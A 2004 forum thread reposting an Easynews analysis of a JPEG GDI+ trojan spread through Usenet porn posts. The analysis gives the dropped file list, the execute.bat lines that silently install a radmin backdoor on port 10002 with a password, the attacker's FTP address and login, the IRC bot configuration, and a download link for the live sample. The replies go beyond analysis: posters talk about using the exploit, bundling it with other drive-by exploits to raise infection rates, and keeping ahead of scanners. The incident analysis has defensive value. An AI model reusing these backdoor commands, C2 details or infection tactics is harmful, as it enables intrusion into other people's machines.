Further information can be found here

JPEG GDI+ Trojan unleashed


Beware of any emails you recive that may contain a URL or attached image.

My personal choice of Virus Scanner

Yeah this exploit is a problem that is going to cause some xp users allot of grief,

the trojan is just the tip of the iceburg and is only one of many exploit scripts out there at the moment, once M$ patch it up I'll release some exploit code for those interested

More information for you stoners yet part time puter buffs..
From an easynews txt file


jpeg virus in the wild?!

UPDATE: To check to see if you have been infected by this virus, look for a directory
named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it.

UPDATE: We have packet logs at http://easynews.com/virus/ THIS VIRUS IS NASTY!

If you don't know what a jpeg virus is, check out:
http://news.google.com/news?q=jpeg+virus

Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com.. It paged
my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for
the second hit.

Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded
almost 2megs of stuff. It installs a trojan that installs itself as a service.

It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."

It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users where logged in!)

it downloads these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe

and executes 'execute.bat', which looks like:

regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server

it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d

Here is the data:

The isolated file is here (BE CAREFUL - DON'T SUE ME FOR DAMAGE, I'LL COUNTER-SUE!):

http://easynews.com/virus/virus-jpeg.zip <-- DO NOT CLICK HERE UNLESS YOU ARE WILLING TO SUFFER MANY CONCEQUENCES.

md5: b7e7a5703a722558b6a170be5c43b90d
crc32:a3e0f71e
size: 4098 bytes

Here is the first message header:

Path: news.easynews.com!core-easynews!newsfeed2.easynews.com!newsfeed1.easynews.com!easynews.com!easynews!cyclone1.gnilink.net!gnilink.net!wn14feed!worldnet.att.net!204.71.34.3!newsfeed.cwix.com!newsfeed.icl.net!newsfeed.wirehub.nl!news.cambrium.nl!news.cambrium.nl!news2.euro.net!62.253.162.219.MISMATCH!news-in.ntli.net!newsrout1-win.ntli.net!ntli.net!newspeer1-win.ntli.net!newsfe3-win.ntli.net.POSTED!53ab2750!not-for-mail
From: Power-Poster@power-post.org (Power-Post 2000)
Sender: Power-Poster@power-post.org
Newsgroups: alt.binaries.multimedia.erotica.transsexuals,alt.binaries.pictures.erotica.transexual,alt.binaries.pictures.erotica.transexual.action,alt.binaries.pictures.erotica.transsexual
Subject: (Shemale-loves it up the ass.jpg (1/1)] [1/1] - Shemale loves it up the ass
X-Newsposter: NNTP POWER-POST 2000 (Build 24c) - net-toys.8k.com
Lines: 96
Message-ID: <A_J5d.105$24.101@newsfe3-win.ntli.net>
Date: Mon, 27 Sep 2004 01:25:52 GMT
NNTP-Posting-Host: 82.1.163.241
X-Trace: newsfe3-win.ntli.net 1096248352 82.1.163.241 (Mon, 27 Sep 2004 02:25:52 BST)
NNTP-Posting-Date: Mon, 27 Sep 2004 02:25:52 BST
Organization: NTL
Xref: core-easynews alt.binaries.multimedia.erotica.transsexuals:1756301 alt.binaries.pictures.erotica.transexual:393069 alt.binaries.pictures.erotica.transexual.action:2666691 alt.binaries.pictures.erotica.transsexual:207823
X-Received-Date: Sun, 26 Sep 2004 19:19:51 MST (news.easynews.com)

And here is the second header:

Path: news.easynews.com!core-easynews!newsfeed2.easynews.com!newsfeed1.easynews.com!easynews.com!easynews!bigfeed2.bellsouth.net!bigfeed.bellsouth.net!news.bellsouth.net!news-in.ntli.net!newsrout1-win.ntli.net!ntli.net!newspeer1-win.ntli.net!newsfe2-win.ntli.net.POSTED!53ab2750!not-for-mail
From: Power-Poster@power-post.org (Power-Post 2000)
Sender: Power-Poster@power-post.org
Newsgroups: alt.binaries.erotica.beanie-babies,alt.binaries.erotica.breasts,alt.binaries.erotica.christy-canyon,alt.binaries.erotica.fetish,alt.binaries.erotica.original.sin,alt.binaries.erotica.pornstar
Subject: (Beautiful 20yr old - double penetration.jpg (1/1)] [1/1] - 20yr old double penetration
X-Newsposter: NNTP POWER-POST 2000 (Build 24c) - net-toys.8k.com
Lines: 96
Message-ID: <S2L5d.341$wW2.317@newsfe2-win.ntli.net>
Date: Mon, 27 Sep 2004 02:38:42 GMT
NNTP-Posting-Host: 82.1.163.241
X-Trace: newsfe2-win.ntli.net 1096252722 82.1.163.241 (Mon, 27 Sep 2004 03:38:42 BST)
NNTP-Posting-Date: Mon, 27 Sep 2004 03:38:42 BST
Organization: NTL
Xref: core-easynews alt.binaries.erotica.beanie-babies:884786 alt.binaries.erotica.breasts:1112072 alt.binaries.erotica.christy-canyon:368690 alt.binaries.erotica.fetish:1386267 alt.binaries.erotica.original.sin:1793 alt.binaries.erotica.pornstar:831729
X-Received-Date: Sun, 26 Sep 2004 20:12:42 MST (news.easynews.com)

Here is a 'djpeg' output:

djpeg -debug b7e7a5703a722558b6a170be5c43b90d0a3e0f71e.jpg > /dev/null
Independent JPEG Group's DJPEG, version 6b 27-Mar-1998
Copyright © 1998, Thomas G. Lane
Start of Image
JFIF APP0 marker: version 1.02, density 100x100 0
APP12, length 15:
Ducky\000\001\000\004\000\000\000
\000\000
Adobe APP14 marker: version 100, flags 0xc000 0x0000, transform 1
Comment, length -1:

Corrupt JPEG data: 130 extraneous bytes before marker 0xc0
Start Of Frame 0xc0: width=555, height=857, components=3
Component 1: 2hx2v q=0
Component 2: 1hx1v q=1
Component 3: 1hx1v q=1
Define Huffman Table 0x00
Define Huffman Table 0x01
Define Huffman Table 0x10
Define Huffman Table 0x11
Start Of Scan: 3 components
Component 1: dc=0 ac=0
Component 2: dc=1 ac=1
Component 3: dc=1 ac=1
Ss=0, Se=63, Ah=0, Al=0
Quantization table 0x00 was not defined

Here is a 'strings' output:

JFIF
Ducky
Adobe
p&.>55555>
DDDDDDDDDDDDD
&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
"2BR
j0_R
}tL#
xgTYdG
<kF`
k>iv
k$bAa
cspkkj
nXc|3
Y9cY
.IBmRp9b
4$XXXX
mmmmm
emDXOR


-- godzilla


Edit #1:
---------
The Bold after the link containing the zip file of the infected jpeg

Edit #2:
----------
Geekier than j00.. Pure..

Hmmm nice. Maybe I'll use it

hardly worth it now that all main stream scanners would have been updated to protect against it already

Yeah, but it could be added to a page that already has the scrollbar installer and drag and drop exploits, improving the chances that the visitor downloads the desired proggie.

Most computers these days would pick that up as a malious script and stop it from loading partyicularly considering your using already solved and patched exploits and/or updated virus definitions

How many average home users have a quality virus scanner AND update weekly AND have it protect in real time? The answer is very few.

I am not sure what you mean buy quality virus scanner but just about all the mainstream virus software have both web and email protection against viruses and malicious scripts , they also tend to bug the hell out of you to update pretty regularly these days,

If your really wanting to get away with a succsessfull infection you need to keep up with the methods/technology that the virus coders and the people who spend time reverce engeniering software are using because generally speaking the viruses that are released onto the public that you hear about on the news and that your scanners update you against are in all honestly fairly mild in the amount of damage they do compaired to what a virus has the potential of

Publicly available exploits and even more so in the case of virri are usually a few months if not up to a year behind the information that is available to people who work themselfs to find the holes or take it apon themselfs to code there own " piece of art "

My sugestion is if your really interested in it to get back to the basics of programming , languages like asm16 , asm 32, and binary are the basis of virri and also ofcourse reverce engeniering , also handy to have a spare machine disconected from the outside world for saftey reasons to do all your work on ,

something else that is commonly overlooked is the fact that Virus coding is 100% legal in most countrys including Australia, provided they are for experimental and testing purposes, however if they could prove you intended to use or had used it on a machine other than your own then the virus would be classed as a "wepon of terrorism "